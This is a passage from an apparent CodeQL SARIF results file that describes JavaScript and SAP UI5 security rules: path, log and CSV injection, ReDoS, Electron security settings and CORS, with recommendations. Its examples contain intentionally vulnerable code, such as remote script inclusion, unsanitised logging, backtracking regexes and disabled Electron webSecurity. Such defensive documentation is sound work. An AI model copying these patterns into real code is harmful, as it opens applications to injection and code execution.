[`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n", - "markdown" : "# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n \"sap/ui/dom/includeScript\"\n ],\n function(includeScript) {\n includeScript(\"http://some.vulnerable.domain/some-script.js\");\n }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/core/util/File\"\n ],\n function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function() {\n let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n this.getView().setModel(oDataV2Model);\n },\n \n onSomeEvent: function() {\n let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n }\n });\n });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-022", "external/cwe/cwe-035" ], - "description" : "Constructing path from an uncontrolled remote source to be passed\n to a filesystem API allows for manipulation of the local filesystem.", - "id" : "js/ui5-path-injection", - "kind" : "path-problem", - "name" : "UI5 Path Injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "7.8" - } - }, { - "id" : "js/ui5-log-injection", - "name" : "js/ui5-log-injection", - "shortDescription" : { - "text" : "UI5 Log injection" - }, - "fullDescription" : { - "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Log Injection\n\nIf an untrusted input, possibly through a UI5 control, is not sanitized and passed onto a logging function, it is possible that a malicious actor submits a crafted input which might lead to forging log entries. If the entries are logged as plaintext, then newline characters may be inserted by the malicious actor. If the entry is interpreted as HTML, then artitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nAvoid directly logging untrusted input from a remote source and sanitize it by replaceing characters so that the input no longer contains control characters and substrings that may be interpreted as HTML.\n\n## Examples\n\nThis UI5 application directly outputs what the user submitted via the `sap.m.Input` control.\n\n``` xml\n\n \n\n```\n\n``` javascript\nsap.ui.define(\n [\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/model/json/JSONModel\",\n \"sap/base/Log/info\",\n ],\n function (Controller, JSONModel, info) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSearchCompleted: function () {\n var oView = this.getView();\n var oSearchField = oView.byId(\"searchTodoItemsInput\");\n var searchValue = oSearchField.getValue();\n info(searchValue); // Sink\n },\n });\n },\n);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n", - "markdown" : "# Log Injection\n\nIf an untrusted input, possibly through a UI5 control, is not sanitized and passed onto a logging function, it is possible that a malicious actor submits a crafted input which might lead to forging log entries. If the entries are logged as plaintext, then newline characters may be inserted by the malicious actor. If the entry is interpreted as HTML, then artitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nAvoid directly logging untrusted input from a remote source and sanitize it by replaceing characters so that the input no longer contains control characters and substrings that may be interpreted as HTML.\n\n## Examples\n\nThis UI5 application directly outputs what the user submitted via the `sap.m.Input` control.\n\n``` xml\n\n \n\n```\n\n``` javascript\nsap.ui.define(\n [\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/model/json/JSONModel\",\n \"sap/base/Log/info\",\n ],\n function (Controller, JSONModel, info) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSearchCompleted: function () {\n var oView = this.getView();\n var oSearchField = oView.byId(\"searchTodoItemsInput\");\n var searchValue = oSearchField.getValue();\n info(searchValue); // Sink\n },\n });\n },\n);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-117" ], - "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", - "id" : "js/ui5-log-injection", - "kind" : "path-problem", - "name" : "UI5 Log injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "7.8" - } - }, { - "id" : "js/ui5-formula-injection", - "name" : "js/ui5-formula-injection", - "shortDescription" : { - "text" : "UI5 Formula Injection" - }, - "fullDescription" : { - "text" : "Saving data from an uncontrolled remote source using filesystem or local storage leads to disclosure of sensitive information or forgery of entry." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/Controller\",\n \"sap/ui/core/util/File\"\n ], function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSomeEvent: function(oEvent) {\n let response = oEvent.getProperty(\"someProperty\").someField;\n let csvRow = \";\" + response + \";\";\n File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n }\n });\n });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n", - "markdown" : "# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/Controller\",\n \"sap/ui/core/util/File\"\n ], function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSomeEvent: function(oEvent) {\n let response = oEvent.getProperty(\"someProperty\").someField;\n let csvRow = \";\" + response + \";\";\n File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n }\n });\n });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-1236" ], - "description" : "Saving data from an uncontrolled remote source using filesystem or local storage\n leads to disclosure of sensitive information or forgery of entry.", - "id" : "js/ui5-formula-injection", - "kind" : "path-problem", - "name" : "UI5 Formula Injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "7.8" - } - } ], - "locations" : [ { - "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/", - "description" : { - "text" : "The QL pack root directory." - } - }, { - "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/qlpack.yml", - "description" : { - "text" : "The QL pack definition file." - } - } ] - }, { - "name" : "codeql/javascript-queries", - "semanticVersion" : "0.8.1+8e890571ed7b21bc10698c5dbd032b9ed551d8f1", - "notifications" : [ { - "id" : "js/diagnostics/extraction-errors", - "name" : "js/diagnostics/extraction-errors", - "shortDescription" : { - "text" : "Extraction errors" - }, - "fullDescription" : { - "text" : "List all extraction errors for files in the source code directory." - }, - "defaultConfiguration" : { - "enabled" : true - }, - "properties" : { - "description" : "List all extraction errors for files in the source code directory.", - "id" : "js/diagnostics/extraction-errors", - "kind" : "diagnostic", - "name" : "Extraction errors" - } - }, { - "id" : "js/diagnostics/successfully-extracted-files", - "name" : "js/diagnostics/successfully-extracted-files", - "shortDescription" : { - "text" : "Successfully extracted files" - }, - "fullDescription" : { - "text" : "Lists all files in the source code directory that were extracted without encountering an error in the file." - }, - "defaultConfiguration" : { - "enabled" : true - }, - "properties" : { - "tags" : [ "successfully-extracted-files" ], - "description" : "Lists all files in the source code directory that were extracted without encountering an error in the file.", - "id" : "js/diagnostics/successfully-extracted-files", - "kind" : "diagnostic", - "name" : "Successfully extracted files" - } - } ], - "rules" : [ { - "id" : "js/polynomial-redos", - "name" : "js/polynomial-redos", - "shortDescription" : { - "text" : "Polynomial regular expression used on uncontrolled data" - }, - "fullDescription" : { - "text" : "A regular expression that can require polynomial time to match may be vulnerable to denial-of-service attacks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Polynomial regular expression used on uncontrolled data\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this use of a regular expression, which removes all leading and trailing whitespace in a string:\n\n```javascript\n\ntext.replace(/^\\s+|\\s+$/g, ''); // BAD\n```\nThe sub-expression `\"\\s+$\"` will match the whitespace characters in `text` from left to right, but it can start matching anywhere within a whitespace sequence. This is problematic for strings that do **not** end with a whitespace character. Such a string will force the regular expression engine to process each whitespace sequence once per whitespace character in the sequence.\n\nThis ultimately means that the time cost of trimming a string is quadratic in the length of the string. So a string like `\"a b\"` will take milliseconds to process, but a similar string with a million spaces instead of just one will take several minutes.\n\nAvoid this problem by rewriting the regular expression to not contain the ambiguity about when to start matching whitespace sequences. For instance, by using a negative look-behind (`/^\\s+|(? 1000) {\n throw new Error(\"Input too long\");\n}\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str)\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", - "markdown" : "# Polynomial regular expression used on uncontrolled data\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this use of a regular expression, which removes all leading and trailing whitespace in a string:\n\n```javascript\n\ntext.replace(/^\\s+|\\s+$/g, ''); // BAD\n```\nThe sub-expression `\"\\s+$\"` will match the whitespace characters in `text` from left to right, but it can start matching anywhere within a whitespace sequence. This is problematic for strings that do **not** end with a whitespace character. Such a string will force the regular expression engine to process each whitespace sequence once per whitespace character in the sequence.\n\nThis ultimately means that the time cost of trimming a string is quadratic in the length of the string. So a string like `\"a b\"` will take milliseconds to process, but a similar string with a million spaces instead of just one will take several minutes.\n\nAvoid this problem by rewriting the regular expression to not contain the ambiguity about when to start matching whitespace sequences. For instance, by using a negative look-behind (`/^\\s+|(? 1000) {\n throw new Error(\"Input too long\");\n}\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str)\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-1333", "external/cwe/cwe-730", "external/cwe/cwe-400" ], - "description" : "A regular expression that can require polynomial time\n to match may be vulnerable to denial-of-service attacks.", - "id" : "js/polynomial-redos", - "kind" : "path-problem", - "name" : "Polynomial regular expression used on uncontrolled data", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/redos", - "name" : "js/redos", - "shortDescription" : { - "text" : "Inefficient regular expression" - }, - "fullDescription" : { - "text" : "A regular expression that requires exponential time to match certain inputs can be a performance bottleneck, and may be vulnerable to denial-of-service attacks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Inefficient regular expression\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this regular expression:\n\n```javascript\n\n/^_(__|.)+_$/\n```\nIts sub-expression `\"(__|.)+?\"` can match the string `\"__\"` either by the first alternative `\"__\"` to the left of the `\"|\"` operator, or by two repetitions of the second alternative `\".\"` to the right. Thus, a string consisting of an odd number of underscores followed by some other character will cause the regular expression engine to run for an exponential amount of time before rejecting the input.\n\nThis problem can be avoided by rewriting the regular expression to remove the ambiguity between the two branches of the alternative inside the repetition:\n\n```javascript\n\n/^_(__|[^_])+_$/\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", - "markdown" : "# Inefficient regular expression\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this regular expression:\n\n```javascript\n\n/^_(__|.)+_$/\n```\nIts sub-expression `\"(__|.)+?\"` can match the string `\"__\"` either by the first alternative `\"__\"` to the left of the `\"|\"` operator, or by two repetitions of the second alternative `\".\"` to the right. Thus, a string consisting of an odd number of underscores followed by some other character will cause the regular expression engine to run for an exponential amount of time before rejecting the input.\n\nThis problem can be avoided by rewriting the regular expression to remove the ambiguity between the two branches of the alternative inside the repetition:\n\n```javascript\n\n/^_(__|[^_])+_$/\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-1333", "external/cwe/cwe-730", "external/cwe/cwe-400" ], - "description" : "A regular expression that requires exponential time to match certain inputs\n can be a performance bottleneck, and may be vulnerable to denial-of-service\n attacks.", - "id" : "js/redos", - "kind" : "problem", - "name" : "Inefficient regular expression", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "7.5" - } - }, { - "id" : "js/disabling-electron-websecurity", - "name" : "js/disabling-electron-websecurity", - "shortDescription" : { - "text" : "Disabling Electron webSecurity" - }, - "fullDescription" : { - "text" : "Disabling webSecurity can cause critical security vulnerabilities." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Disabling Electron webSecurity\nElectron is secure by default through a same-origin policy requiring all JavaScript and CSS code to originate from the machine running the Electron application. Setting the `webSecurity` property of a `webPreferences` object to `false` will disable the same-origin policy.\n\nDisabling the same-origin policy is strongly discouraged.\n\n\n## Recommendation\nDo not disable `webSecurity`.\n\n\n## Example\nThe following example shows `webSecurity` being disabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n webPreferences: {\n webSecurity: false\n }\n})\n```\nThis is problematic, since it allows the execution of insecure code from other domains.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#5-do-not-disable-websecurity)\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n", - "markdown" : "# Disabling Electron webSecurity\nElectron is secure by default through a same-origin policy requiring all JavaScript and CSS code to originate from the machine running the Electron application. Setting the `webSecurity` property of a `webPreferences` object to `false` will disable the same-origin policy.\n\nDisabling the same-origin policy is strongly discouraged.\n\n\n## Recommendation\nDo not disable `webSecurity`.\n\n\n## Example\nThe following example shows `webSecurity` being disabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n webPreferences: {\n webSecurity: false\n }\n})\n```\nThis is problematic, since it allows the execution of insecure code from other domains.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#5-do-not-disable-websecurity)\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n" - }, - "properties" : { - "tags" : [ "security", "frameworks/electron", "external/cwe/cwe-79" ], - "description" : "Disabling webSecurity can cause critical security vulnerabilities.", - "id" : "js/disabling-electron-websecurity", - "kind" : "problem", - "name" : "Disabling Electron webSecurity", - "precision" : "very-high", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, { - "id" : "js/enabling-electron-insecure-content", - "name" : "js/enabling-electron-insecure-content", - "shortDescription" : { - "text" : "Enabling Electron allowRunningInsecureContent" - }, - "fullDescription" : { - "text" : "Enabling allowRunningInsecureContent can allow remote code execution." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Enabling Electron allowRunningInsecureContent\nElectron is secure by default through a policy banning the execution of content loaded over HTTP. Setting the `allowRunningInsecureContent` property of a `webPreferences` object to `true` will disable this policy.\n\nEnabling the execution of insecure content is strongly discouraged.\n\n\n## Recommendation\nDo not enable the `allowRunningInsecureContent` property.\n\n\n## Example\nThe following example shows `allowRunningInsecureContent` being enabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n webPreferences: {\n allowRunningInsecureContent: true\n }\n})\n```\nThis is problematic, since it allows the execution of code from an untrusted origin.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#8-do-not-set-allowrunninginsecurecontent-to-true)\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n", - "markdown" : "# Enabling Electron allowRunningInsecureContent\nElectron is secure by default through a policy banning the execution of content loaded over HTTP. Setting the `allowRunningInsecureContent` property of a `webPreferences` object to `true` will disable this policy.\n\nEnabling the execution of insecure content is strongly discouraged.\n\n\n## Recommendation\nDo not enable the `allowRunningInsecureContent` property.\n\n\n## Example\nThe following example shows `allowRunningInsecureContent` being enabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n webPreferences: {\n allowRunningInsecureContent: true\n }\n})\n```\nThis is problematic, since it allows the execution of code from an untrusted origin.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#8-do-not-set-allowrunninginsecurecontent-to-true)\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n" - }, - "properties" : { - "tags" : [ "security", "frameworks/electron", "external/cwe/cwe-494" ], - "description" : "Enabling allowRunningInsecureContent can allow remote code execution.", - "id" : "js/enabling-electron-insecure-content", - "kind" : "problem", - "name" : "Enabling Electron allowRunningInsecureContent", - "precision" : "very-high", - "problem.severity" : "error", - "security-severity" : "8.8" - } - }, { - "id" : "js/cors-misconfiguration-for-credentials", - "name" : "js/cors-misconfiguration-for-credentials", - "shortDescription" : { - "text" : "CORS misconfiguration for credentials transfer" - }, - "fullDescription" : { - "text" : "Misconfiguration of CORS HTTP headers allows for leaks of secret credentials." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# CORS misconfiguration for credentials transfer\nA server can send the `\"Access-Control-Allow-Credentials\"` CORS header to control when a browser may send user credentials in Cross-Origin HTTP requests.\n\nWhen the `Access-Control-Allow-Credentials` header is `\"true\"`, the `Access-Control-Allow-Origin` header must have a value different from `\"*\"` in order to make browsers accept the header. Therefore, to allow multiple origins for Cross-Origin requests with credentials, the server must dynamically compute the value of the `\"Access-Control-Allow-Origin\"` header. Computing this header value from information in the request to the server can therefore potentially allow an attacker to control the origins that the browser sends credentials to.\n\n\n## Recommendation\nWhen the `Access-Control-Allow-Credentials` header value is `\"true\"`, a dynamic computation of the `Access-Control-Allow-Origin` header must involve sanitization if it relies on user-controlled input.\n\nSince the `\"null\"` origin is easy to obtain for an attacker, it is never safe to use `\"null\"` as the value of the `Access-Control-Allow-Origin` header when the `Access-Control-Allow-Credentials` header value is `\"true\"`.\n\n\n## Example\nIn the example below, the server allows the browser to send user credentials in a Cross-Origin request. The request header `origins` controls the allowed origins for such a Cross-Origin request.\n\n\n```javascript\nvar https = 